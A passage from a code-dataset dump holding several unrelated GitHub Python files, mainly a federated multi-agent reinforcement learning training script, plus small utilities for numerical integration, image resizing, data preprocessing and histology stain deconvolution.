########################################\n\nfor p in PARAMETER_LIST:\n run_calc(p)\n \n","repo_name":"AKEngels/CAST","sub_path":"optional_files/scripts/umbrella_stuff/umbrella2d_helper.py","file_name":"umbrella2d_helper.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} 
+{"seq_id":"41935628573","text":"from math import pi\n\nimport view\nimport integral\n\n\ndef main() -> None:\n tetta = [0.05, 0.05, 10.0]\n\n ns, ms = [], []\n md1s, md2s = [], []\n ints = []\n\n terminate = '0'\n while terminate == '0':\n try:\n ns.append(int(input(\"Input N: \")))\n ms.append(int(input(\"Input M: \")))\n param = float(input(\"Enter parameter: \"))\n print(\"Entry integration mode (0 - Gauss, 1 - Simpson)\")\n md1s.append(int(input(\"Outer integration mode: \")))\n md2s.append(int(input(\"Inner integration mode: \")))\n except ValueError:\n print(\"Invalid input data. Program is terminated.\")\n return\n\n lm = [[0, pi / 2], [0, pi / 2]]\n\n ints.append(integral.Integral(lm, [ns[-1], ms[-1]], [md1s[-1], md2s[-1]]))\n\n print(\"Result with {} as a parameter is {:.5f}\".format(tetta, ints[-1](param)))\n\n terminate = input(\"If you want stop execution, entry not 0?: \")\n view.plot(ints, tetta, ns, ms, md1s, md2s)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Flash1ee/ca-labs-4th-sem-bmstu","sub_path":"lab_05/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1541886484","text":"# -*- coding: utf-8 -*-\n#from __future__ import division\nimport argparse\nimport bz2\nfrom datetime import datetime\nimport os\nimport sys\n\nsys.path.append('../..')\nsys.path.append('./')\n\nimport pickle\nimport GLOBAL_PRARM as gp\n\nimport numpy as np\nimport math\nimport copy\nimport torch\nfrom tqdm import trange\nfrom collections import defaultdict, deque\n\nimport multiprocessing\nimport torch.multiprocessing\n# torch.multiprocessing.set_sharing_strategy('file_system')\n# TODO: When running in server, uncomment this line if needed\nimport copy as cp\n\nfrom acer_fedstep.agent import Agent\nfrom game import Decentralized_Game as Env\nfrom memory import ReplayMemory\nfrom test import test, test_p\n\n# from pympler.tracker import SummaryTracker\n# tracker = SummaryTracker()\n\n# Note that hyperparameters may originally be reported in ATARI game frames instead of agent steps\nparser = argparse.ArgumentParser(description='Rainbow')\nparser.add_argument('--id', type=str, default='default_acer_q', help='Experiment ID')\nparser.add_argument('--seed', type=int, default=123, help='Random seed')\nparser.add_argument('--disable-cuda', action='store_true', help='Disable CUDA')\nparser.add_argument('--T-max', type=int, default=int(50e6), metavar='STEPS',\n help='Number of training steps (4x number of frames)')\nparser.add_argument('--max-episode-length', type=int, default=int(108e3), metavar='LENGTH',\n help='Max episode length in game frames (0 to disable)')\n# TODO: Note that the change of UAV numbers should also change the history-length variable\nparser.add_argument('--previous-action-observable', action='store_false', help='Observe previous action? (AP)')\nparser.add_argument('--current-action-observable', action='store_true', help='Observe previous action? 
(AP)')\nparser.add_argument('--history-length', type=int, default=2, metavar='T',\n help='Total number of history state')\nparser.add_argument('--architecture', type=str, default='canonical_61obv_16ap', metavar='ARCH', help='Network architecture')\n# TODO: if select resnet8, obs v8 and dims 4 should be set in gp\nparser.add_argument('--hidden-size', type=int, default=256, metavar='SIZE', help='Network hidden size')\nparser.add_argument('--noisy-std', type=float, default=0.3, metavar='σ',\n help='Initial standard deviation of noisy linear layers')\nparser.add_argument('--atoms', type=int, default=21, metavar='C', help='Discretised size of value distribution')\nparser.add_argument('--V-min', type=float, default=-1, metavar='V', help='Minimum of value distribution support')\nparser.add_argument('--V-max', type=float, default=1, metavar='V', help='Maximum of value distribution support')\n# TODO: Make sure the value located inside V_min and V_max\nparser.add_argument('--epsilon-min', type=float, default=0.0, metavar='ep_d', help='Minimum of epsilon')\nparser.add_argument('--epsilon-max', type=float, default=0.0, metavar='ep_u', help='Maximum of epsilon')\nparser.add_argument('--epsilon-delta', type=float, default=0.0001, metavar='ep_d', help='Decreasing step of epsilon')\n# TODO: Set the ep carefully\nparser.add_argument('--action-selection', type=str, default='boltzmann', metavar='action_type',\n choices=['greedy', 'boltzmann', 'no_limit'],\n help='Type of action selection algorithm, 1: greedy, 2: boltzmann')\nparser.add_argument('--model', type=str, default=None, metavar='PARAM', help='Pretrained model (state dict)')\nparser.add_argument('--memory-capacity', type=int, default=int(12e3), metavar='CAPACITY',\n help='Experience replay memory capacity')\nparser.add_argument('--replay-frequency', type=int, default=4, metavar='k', help='Frequency of sampling from memory')\nparser.add_argument('--priority-exponent', type=float, default=0.5, metavar='ω',\n help='Prioritised experience replay exponent (originally denoted α)')\nparser.add_argument('--priority-weight', type=float, default=0.4, metavar='β',\n help='Initial prioritised experience replay importance sampling weight')\nparser.add_argument('--multi-step', type=int, default=1, metavar='n',\n help='Number of steps for multi-step return')\nparser.add_argument('--discount', type=float, default=1, metavar='γ', help='Discount factor')\nparser.add_argument('--target-update', type=int, default=int(4000), metavar='τ',\n help='Number of steps after which to update target network')\nparser.add_argument('--reward-clip', type=int, default=1, metavar='VALUE', help='Reward clipping (0 to disable)')\nparser.add_argument('--learning-rate', type=float, default=0.0000625, metavar='η', help='Learning rate')\nparser.add_argument('--reward-update-rate', type=float, default=0.01, metavar='η',\n help='Average value step rate (for non-episodic task)')\nparser.add_argument('--adam-eps', type=float, default=1.5e-4, metavar='ε', help='Adam epsilon')\nparser.add_argument('--batch-size', type=int, default=32, metavar='SIZE', help='Batch size')\nparser.add_argument('--better-indicator', type=float, default=1.05, metavar='b',\n help='The new model should be b times of old performance to be recorded')\n# TODO: Switch interval should not be large\nparser.add_argument('--learn-start', type=int, default=int(400), metavar='STEPS',\n help='Number of steps before starting training')\nparser.add_argument('--evaluate', action='store_true', help='Evaluate 
only')\nparser.add_argument('--data-reinforce', action='store_true', help='DataReinforcement')\n# TODO: Change this after debug\nparser.add_argument('--evaluation-interval', type=int, default=400, metavar='STEPS',\n help='Number of training steps between evaluations')\nparser.add_argument('--evaluation-episodes', type=int, default=1000, metavar='N',\n help='Number of evaluation episodes to average over')\n# TODO: Note that DeepMind's evaluation method is running the latest agent for 500K frames ever every 1M steps\n# TODO: Change this after debug\nparser.add_argument('--evaluation-size', type=int, default=20, metavar='N',\n help='Number of transitions to use for validating Q')\n# TODO: This evaluation-size is used for Q value evaluation, can be small if Q is not important\nparser.add_argument('--render', action='store_false', help='Display screen (testing only)')\nparser.add_argument('--enable-cudnn', action='store_true', help='Enable cuDNN (faster but nondeterministic)')\nparser.add_argument('--checkpoint-interval', default=0,\n help='How often to checkpoint the model, defaults to 0 (never checkpoint)')\nparser.add_argument('--memory', type=str,\n help='Path to save/load the memory from')\nparser.add_argument('--disable-bzip-memory', action='store_false',\n help='Don\\'t zip the memory file. Not recommended (zipping is a bit slower and much, much smaller)')\n# TODO: Change federated round each time\nparser.add_argument('--federated-round', type=int, default=20, metavar='F',\n help='Rounds to perform global combination, set a negative number to disable federated aggregation')\n\n# Setup\nargs = parser.parse_args()\n\nprint(' ' * 26 + 'Options')\nfor k, v in vars(args).items():\n print(' ' * 26 + k + ': ' + str(v))\nresults_dir = os.path.join('./results', args.id)\nif not os.path.exists(results_dir):\n os.makedirs(results_dir)\n\nmetrics = {'steps': [], 'rewards': [], 'Qs': [], 'best_avg_reward': -float('inf')}\nmetrics_all = {'steps': [], 'reward': []}\nnp.random.seed(args.seed)\ntorch.manual_seed(np.random.randint(1, 10000))\n# if torch.cuda.is_available() and not args.disable_cuda:\n# args.device = torch.device('cuda')\n# torch.cuda.manual_seed(np.random.randint(1, 10000))\n# torch.backends.cudnn.enabled = args.enable_cudnn\n# else:\n# args.device = torch.device('cpu')\nargs.device = torch.device('cpu')\n\n\n# Simple ISO 8601 timestamped logger\ndef log(s):\n print('[' + str(datetime.now().strftime('%Y-%m-%dT%H:%M:%S')) + '] ' + s)\n\n\ndef average_weights(list_of_weight):\n \"\"\"aggregate all weights\"\"\"\n averga_w = copy.deepcopy(list_of_weight[0])\n for key in averga_w.keys():\n for ind in range(1, len(list_of_weight)):\n averga_w[key] += list_of_weight[ind][key]\n averga_w[key] = torch.div(averga_w[key], len(list_of_weight))\n return averga_w\n\n\ndef load_memory(memory_path, disable_bzip):\n if disable_bzip:\n with open(memory_path, 'rb') as pickle_file:\n return pickle.load(pickle_file)\n else:\n with bz2.open(memory_path, 'rb') as zipped_pickle_file:\n return pickle.load(zipped_pickle_file)\n\n\ndef save_memory(memory, memory_path, disable_bzip, index=-1):\n # save ap mem\n memory_path = memory_path[0:-4] + str(index) + memory_path[-4:]\n if disable_bzip:\n with open(memory_path, 'wb') as pickle_file:\n pickle.dump(memory, pickle_file)\n else:\n with bz2.open(memory_path, 'wb') as zipped_pickle_file:\n pickle.dump(memory, zipped_pickle_file)\n\n\ndef run_game_once_parallel_random(new_game, train_history_aps_parallel, episode):\n train_examples_aps = []\n for _ in 
range(new_game.environment.ap_number):\n train_examples_aps.append([])\n eps, done = 0, True\n while eps < episode:\n if done:\n done = new_game.reset()\n state, action, action_logp, avail, reward, done, _ = new_game.step() # Step\n for index_p, ele_p in enumerate(state):\n neighbor_indice = new_game.environment.coop_graph.neighbor_indices(index_p, True)\n action_patch = np.append(action, [-1])\n train_examples_aps[index_p].append((ele_p, action[index_p], action_logp[index_p],\n action_patch[neighbor_indice],\n action, avail[index_p], reward[index_p], done))\n eps += 1\n train_history_aps_parallel.append(train_examples_aps)\n\n\n# Environment\nenv = Env(args)\naction_space = env.get_action_size()\n\n# Agent\ndqn = []\nmatric = []\nfor _ in range(env.environment.ap_number):\n # dqn.append(temp)\n dqn.append(Agent(args, env, _))\n matric.append(copy.deepcopy(metrics))\n\nglobal_model = Agent(args, env, \"Global_\")\n\n# If a model is provided, and evaluate is fale, presumably we want to resume, so try to load memory\nif args.model is not None and not args.evaluate:\n if not args.memory:\n raise ValueError('Cannot resume training without memory save path. Aborting...')\n elif not os.path.exists(args.memory):\n raise ValueError('Could not find memory file at {path}. Aborting...'.format(path=args.memory))\n\n mem_aps = []\n for index in range(env.environment.ap_number):\n path = os.path.join(args.memory, ('metrics_aps' + str(index) + '.pth'))\n mem_aps.append(load_memory(path, args.disable_bzip_memory))\nelse:\n mem_aps = []\n for _ in range(env.environment.ap_number):\n mem_aps.append(ReplayMemory(args, args.memory_capacity, env.remove_previous_action))\n\ntry:\n sis_list = dqn[0].assign_sister_nodes\nexcept AttributeError:\n pass\nelse:\n for _ in range(env.environment.ap_number):\n dqn[_].assign_sister_nodes(dqn, mem_aps)\n# assign sister nodes for MADDPG\n\npriority_weight_increase = (1 - args.priority_weight) / (args.T_max - args.learn_start)\n\n# Construct validation memory\nval_mem_aps = []\nfor _ in range(env.environment.ap_number):\n val_mem_aps.append(ReplayMemory(args, args.evaluation_size, env.remove_previous_action))\nif not gp.PARALLEL_EXICUSION:\n T, done = 0, True\n while T < args.evaluation_size:\n if done:\n done = env.reset()\n state, action, action_logp, avail, reward, done, _ = env.step()\n for index, ele in enumerate(state):\n neighbor_indice = env.environment.coop_graph.neighbor_indices(index, True)\n action_patch = np.append(action, [-1])\n val_mem_aps[index].append(ele, action[index], action_logp[index], action_patch[neighbor_indice],\n action, avail[index], reward[index], done)\n T += 1\nelse:\n num_cores = min(multiprocessing.cpu_count(), gp.ALLOCATED_CORES) - 1\n num_eps = math.ceil(args.evaluation_size / num_cores)\n # make sure each subprocess can finish all the game (end with done)\n with multiprocessing.Manager() as manager:\n train_history_aps = manager.list()\n\n process_list = []\n for _ in range(num_cores):\n process = multiprocessing.Process(target=run_game_once_parallel_random,\n args=(cp.deepcopy(env), train_history_aps, num_eps))\n process_list.append(process)\n\n for pro in process_list:\n pro.start()\n for pro in process_list:\n pro.join()\n pro.terminate()\n\n for res in train_history_aps:\n for index, memerys in enumerate(res):\n for state, a, alog, na, ga, av, rw, done in memerys:\n val_mem_aps[index].append(state, a, alog, na, ga, av, rw, done)\n\nif args.evaluate:\n for index in range(env.environment.ap_number):\n dqn[index].eval() # Set DQN 
(online network) to evaluation mode\n (avg_pack) = test(args, 0, dqn, val_mem_aps, matric, results_dir, evaluate=True) # Test\n for index in range(env.environment.ap_number):\n print('Avg. reward for ap' + str(index) + ': ' + str(avg_pack[0][index]) + ' | Avg. Q: ' + str(avg_pack[1][index]))\nelse:\n # Training loop\n T, aps_state, epsilon, done = 0, None, args.epsilon_max, env.reset()\n reinforce_ap = []\n for i in range(env.environment.ap_number):\n temp = []\n for j in range(3):\n temp.append([])\n reinforce_ap.append(temp)\n\n for T in trange(1, args.T_max + 1):\n if done and T > 2:\n done = env.reset()\n if T > 1 and args.data_reinforce:\n for index, ap_rein in enumerate(reinforce_ap):\n for ap_pair in ap_rein:\n for ap_ele in ap_pair:\n mem_aps[index].append(ap_ele[0], ap_ele[1], ap_ele[2], ap_ele[3],\n ap_ele[4], ap_ele[5], ap_ele[6], ap_ele[7])\n reinforce_ap = []\n for i in range(env.environment.ap_number):\n temp = []\n for j in range(3):\n temp.append([])\n reinforce_ap.append(temp)\n\n # training loop\n if T % args.replay_frequency == 0:\n for _ in range(env.environment.ap_number):\n dqn[_].reset_noise()\n\n state, action, action_logp, avail, reward, done, _ = env.step(dqn)\n epsilon = epsilon - args.epsilon_delta\n epsilon = np.clip(epsilon, a_min=args.epsilon_min, a_max=args.epsilon_max)\n\n for _ in range(env.environment.ap_number):\n if args.reward_clip > 0:\n reward[_] = torch.clamp(reward[_], max=args.reward_clip, min=-args.reward_clip) # Clip rewards\n neighbor_indice = env.environment.coop_graph.neighbor_indices(_, True)\n action_patch = np.append(action, [-1])\n mem_aps[_].append(state[_], action[_], action_logp[_], action_patch[neighbor_indice],\n action, avail[_], reward[_], done)\n dqn[_].update_neighbor_indice(neighbor_indice)\n # Append transition to memory\n if args.data_reinforce:\n # data reinforcement, not applicapable with infinite environment\n obs = state[_]\n obs = torch.rot90(obs, 2, [1, 2])\n if action[_] != 12 and not reward[_] == 0:\n reinforce_ap[_][0].append((obs, env.rot_action(action[_]), action_logp[_],\n env.rot_action(action_patch[neighbor_indice]),\n env.rot_action(action), env.rot_avail(avail[_]), reward[_], done))\n reinforce_ap[_][1].append((torch.flip(obs, [1]), env.flip_action(env.rot_action(action))[_],\n action_logp[_],\n env.flip_action(env.rot_action(action_patch[neighbor_indice])),\n env.flip_action(env.rot_action(action)),\n env.flip_avail(env.rot_avail(avail[_])), reward[_], done))\n reinforce_ap[_][2].append((torch.flip(state[_], [1]), env.flip_action(action)[_], action_logp[_],\n env.flip_action(action_patch[neighbor_indice]),\n env.flip_action(action), env.flip_avail(avail[_]), reward[_], done))\n # append rotated observation for data reinforcement\n\n if T >= args.learn_start:\n # tracker.print_diff()\n for index in range(env.environment.ap_number):\n mem_aps[index].priority_weight = min(mem_aps[index].priority_weight + priority_weight_increase, 1)\n # Anneal importance sampling weight β to 1\n\n if T % args.replay_frequency == 0:\n for index in range(env.environment.ap_number):\n dqn[index].learn(mem_aps[index]) # Train with n-step distributional double-Q learning\n\n if 0 < args.federated_round and T % args.federated_round == 0:\n global_weight = average_weights([model.get_state_dict() for model in dqn])\n global_target = average_weights([model.get_target_dict() for model in dqn])\n global_model.set_state_dict(global_weight)\n # global_model.set_target_dict(global_target)\n log('T = ' + str(T) + ' / ' + str(args.T_max) + ' 
Global averaging starts')\n average_reward = np.array([model.average_reward for model in dqn])\n average_reward = np.mean(average_reward)\n log('T = ' + str(T) + ' / ' + str(args.T_max) + ' Averaged reward is: ' + str(float(average_reward)))\n for models in dqn:\n models.set_state_dict(global_weight)\n # models.set_target_dict(global_target)\n models.average_reward = average_reward\n\n # If memory path provided, save it\n for index in range(env.environment.ap_number):\n if args.memory is not None:\n save_memory(mem_aps[index], args.memory, args.disable_bzip_memory, index)\n\n # Update target network\n # if T % args.target_update == 0: # uncomment for hard update\n for index in range(env.environment.ap_number):\n dqn[index].soft_update_target_net(1/args.target_update)\n\n # Checkpoint the network\n if (args.checkpoint_interval != 0) and (T % args.checkpoint_interval == 0):\n for index in range(env.environment.ap_number):\n dqn[index].save(results_dir, 'checkpoint' + str(index) + '.pth')\n\n if T % args.evaluation_interval == 0 and T >= args.learn_start:\n for index in range(env.environment.ap_number):\n dqn[index].eval() # Set DQN (online network) to evaluation mode\n\n if gp.PARALLEL_EXICUSION:\n aps_pack = test_p(args, T, dqn, val_mem_aps, metrics_all, matric, results_dir) # Test\n else:\n aps_pack = test(args, T, dqn, val_mem_aps, metrics_all, matric, results_dir) # Test\n\n log('T = ' + str(T) + ' / ' + str(aps_pack[3]) + ' Shapped Summed Reward.')\n if aps_pack[2]:\n log('T = ' + str(T) + ' / ' + str(args.T_max) + ' Better model, accepted.')\n global_model.save(results_dir, 'Global_')\n # for ind, mod in enumerate(dqn):\n # mod.save(results_dir, ind)\n else:\n log('T = ' + str(T) + ' / ' + str(args.T_max) + ' Worse model, reject.')\n for index in range(env.environment.ap_number):\n log('T = ' + str(T) + ' / ' + str(args.T_max) + ' For ap' + str(index) +\n ' | Avg. reward: ' + str(aps_pack[0][index]) + ' | Avg. Q: ' + str(aps_pack[1][index])\n + ' | Avg. 
R: ' + str(float(dqn[index].average_reward)))\n\n for index in range(env.environment.ap_number):\n dqn[index].train() # Set DQN (online network) back to training mode\n\nenv.close()\n","repo_name":"paperflight/Fed-MF-MAL","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":20641,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"} +{"seq_id":"71377157448","text":"import pandas as pd\nfrom preprocessing import Preprocessor\n\ndf = pd.read_csv(\"../feature-engineering/all_mun_features/mun_features.csv\")\ndf = df.head(1000)\ndf = df[['mun_vehicles_rate', 'mun_motorcycles_rate']]\n\ntrain, test = train_test_split(df, test_size = 0.2)\n\np = Preprocessor(df)\np.df\np.scale_features_training(['mun_vehicles_rate', 'mun_motorcycles_rate'])\np.df\n\n","repo_name":"dssg/infonavit-public","sub_path":"pipeline_src/preprocessing_tests.py","file_name":"preprocessing_tests.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"43550371016","text":"import numpy as np\nimport cv2\n\n\ndef show_img(img, title='example'):\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR) # to cv2 bgr\n cv2.imshow(title, img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\ndef read_img(path) -> np.ndarray:\n img = cv2.imread(path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n return img\n\ndef letterbox_resize(img, size, show=False):\n '''resize image with unchanged aspect ratio using padding'''\n ih, iw = img.shape[:2]\n h, w = size\n if ih > iw :\n nh = h\n nw = int(h / ih * iw)\n elif ih < iw:\n nw = w\n nh = int(w / iw * ih)\n else:\n nh, nw = h, w\n # resize the image to small side is\n\n img_resize = cv2.resize(img, (nw, nh), interpolation=cv2.INTER_CUBIC)\n new_image = np.empty((size[0], size[1], 3), dtype=np.uint8)\n new_image[...] = (128, 128, 128)\n try:\n if ih < iw:\n new_image[(h - nh) // 2: (h - nh) // 2 + nh, (w - nw) // 2:] = img_resize\n elif ih > iw:\n new_image[(h - nh) // 2:, (w - nw) // 2:(w - nw) // 2 + nw, :] = img_resize\n else:\n new_image = img_resize\n\n\n except Exception as e:\n print(e)\n print(\"image shape:{}, resize shape: {}\".format(img.shape, (nh, nw)))\n\n if show:\n # print(new_image.shape)\n show_img(new_image)\n\n return new_image\n\ndef image_inference_preprocess(img, reshape_size):\n img = letterbox_resize(img, reshape_size, show=False)\n img = np.array(img, dtype=np.float32)\n img /= 255\n img = np.expand_dims(img, axis=0)\n return img\n","repo_name":"cshjarry/rc_net","sub_path":"utils/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17807259411","text":"import sys\r\n\r\nstring = sys.stdin.readline().rstrip().lower()\r\nchar_dict = {}\r\nmax_char = []\r\n\r\nfor char in string:\r\n char_dict[char] = char_dict.get(char, 0) + 1\r\n \r\nM = max(char_dict.values())\r\n\r\nfor key, value in char_dict.items():\r\n if value == M:\r\n max_char.append(key)\r\n\r\nif len(max_char) == 1:\r\n print(max_char[0].upper())\r\nelse:\r\n print('?')","repo_name":"chae-yoon/algorithm","sub_path":"백준/Bronze/1157. 
단어 공부/단어 공부.py","file_name":"단어 공부.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32925538231","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 4 17:13:26 2022\n\n@author: user01\n\"\"\"\nimport cv2\nimport numpy as np\nfrom scipy import linalg\nimport numpy as np\nfrom scipy import ndimage as ndi\nimport tensorflow as tf\nfrom skimage import measure, morphology\nfrom scipy.ndimage import binary_fill_holes\nfrom skimage.segmentation import find_boundaries\nfrom gray2color import gray2color\nimport cv2\nimport copy\nfrom gray2color import gray2color\nimport matplotlib.pyplot as plt\n\n# Normalized optical density (OD) matrix M for H and E.\nrgb_from_her = np.array([[0.65, 0.70, 0.29], # H\n [0.07, 0.99, 0.11], # E\n [0.00, 0.00, 0.00]])# R\nrgb_from_her[2, :] = np.cross(rgb_from_her[0, :], rgb_from_her[1, :])\nher_from_rgb = linalg.inv(rgb_from_her)\n\n# lookup tables for bwmorph_thin\nG123_LUT = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1,\n 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0,\n 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0,\n 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1,\n 0, 0, 0], dtype=np.bool)\n\nG123P_LUT = np.array([0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0,\n 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0,\n 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0,\n 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 0, 1,\n 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0], dtype=np.bool)\n\ndef bwmorph_thin(image, n_iter=None):\n # check parameters\n if n_iter is None:\n n = -1\n elif n_iter <= 0:\n raise ValueError('n_iter must be > 0')\n else:\n n = n_iter\n \n # check that we have a 2d binary image, and convert it\n # to uint8\n skel = np.array(image).astype(np.uint8)\n \n if skel.ndim != 2:\n raise ValueError('2D array required')\n if not np.all(np.in1d(image.flat,(0,1))):\n raise ValueError('Image contains values other than 0 and 1')\n\n # neighborhood mask\n mask = np.array([[ 8, 4, 2],\n [16, 0, 1],\n [32, 64,128]],dtype=np.uint8)\n\n # iterate either 1) indefinitely or 2) up to iteration limit\n while n != 0:\n before = np.sum(skel) # count points before thinning\n \n # for each subiteration\n for lut in [G123_LUT, G123P_LUT]:\n # correlate image with neighborhood mask\n N = ndi.correlate(skel, mask, mode='constant')\n 
# take deletion decision from this subiteration's LUT\n D = np.take(lut, N)\n # perform deletion\n skel[D] = 0\n \n after = np.sum(skel) # coint points after thinning\n \n if before == after: \n # iteration had no effect: finish\n break\n \n # count down to iteration limit (or endlessly negative)\n n -= 1\n skel = skel.astype(np.bool)\n return skel.astype(np.uint8)\n\ndef deconv_stains(rgb, conv_matrix):\n '''\n Parameters\n ----------\n rgb: a 3-channel RGB iamge with channel dim at axis=-1 e.g. (W,H,3) type: uint8/float32\n conv_matrix: Deconvolution matrix D of shape (3,3); type: float32\n Returns\n -------\n image with doconvolved stains, same dimension as input.\n '''\n # change datatype to float64\n rgb = (rgb).astype(np.float64)\n np.maximum(rgb, 1E-6, out=rgb) # to avoid log artifacts\n log_adjust = np.log(1E-6) # for compensate the sum above\n x = np.log(rgb)\n stains = (x / log_adjust) @ conv_matrix\n\n # normalizing and shifting the data distribution to proper pixel values range (i.e., [0,255])\n h = 1 - (stains[:,:,0]-np.min(stains[:,:,0]))/(np.max(stains[:,:,0])-np.min(stains[:,:,0]))\n e = 1 - (stains[:,:,1]-np.min(stains[:,:,1]))/(np.max(stains[:,:,1])-np.min(stains[:,:,1]))\n r = 1 - (stains[:,:,2]-np.min(stains[:,:,2]))/(np.max(stains[:,:,2])-np.min(stains[:,:,2]))\n\n her = cv2.merge((h,e,r)) * 255\n\n return her.astype(np.uint8)\n\ndef enclose_boundry(sem_mask, instances):\n frame = np.ones(sem_mask.shape)\n frame[2:-2,2:-2] = 0\n # for nuclie who are touching the image boudry\n inst_b = np.multiply(frame, sem_mask)\n inst_b = np.add(instances, inst_b)\n _,inst_b = cv2.threshold(inst_b, 0, 1, cv2.THRESH_BINARY)\n inst_b = inst_b.astype(np.uint8)\n return inst_b\ndef read_img(img_path, modelip_img_w, modelip_img_h):\n \n img = cv2.imread(img_path, -1) \n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n \n h = deconv_stains(img, her_from_rgb)\n \n img = cv2.resize(img, (modelip_img_w, modelip_img_h), interpolation=cv2.INTER_LINEAR) \n h = cv2.resize(h, (modelip_img_w, modelip_img_h), interpolation=cv2.INTER_LINEAR) \n \n return img, h\n \ndef Tumor_IO(img_path, sem_mask, inst_mask, modelip_img_w, modelip_img_h):\n '''\n See desdcription of Depth_Data_Generator\n '''\n img = cv2.imread(img_path, -1) \n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n #h = decovn_he(img)\n h = deconv_stains(img, her_from_rgb)\n\n sem = cv2.imread(sem_mask, -1)\n inst = cv2.imread(inst_mask, -1)\n if len(np.unique(sem)) == 1:# b/c only BG is present\n sem = sem * 0\n inst = inst * 0\n # b/c the overlayed boundries might contain pixel value > 1\n _,inst = cv2.threshold(inst, 0, 1, cv2.THRESH_BINARY)\n \n # verify boundries enclosement\n # still we need to enclose boundry to be consistent in test and train time\n inst = enclose_boundry(sem, inst)\n \n if img.shape[0] != modelip_img_w:\n img = cv2.resize(img, (modelip_img_w, modelip_img_h), interpolation=cv2.INTER_LINEAR) \n h = cv2.resize(h, (modelip_img_w, modelip_img_h), interpolation=cv2.INTER_LINEAR) \n \n # to normalize [0, 255] pixel values to [0, 1]\n # if you are using builtin keras model then dont normalize\n img = img\n h = h \n inst = inst[:,:, np.newaxis]\n sem = sem[:,:, np.newaxis]\n \n return img, sem, inst, h\n\ndef gray2encoded(y_true, num_class):\n '''\n Parameters\n ----------\n y_true : 2D array of shape [H x W] containing unique pixel values for all N classes i.e., [0, 1, ..., N] \n num_class : int no. 
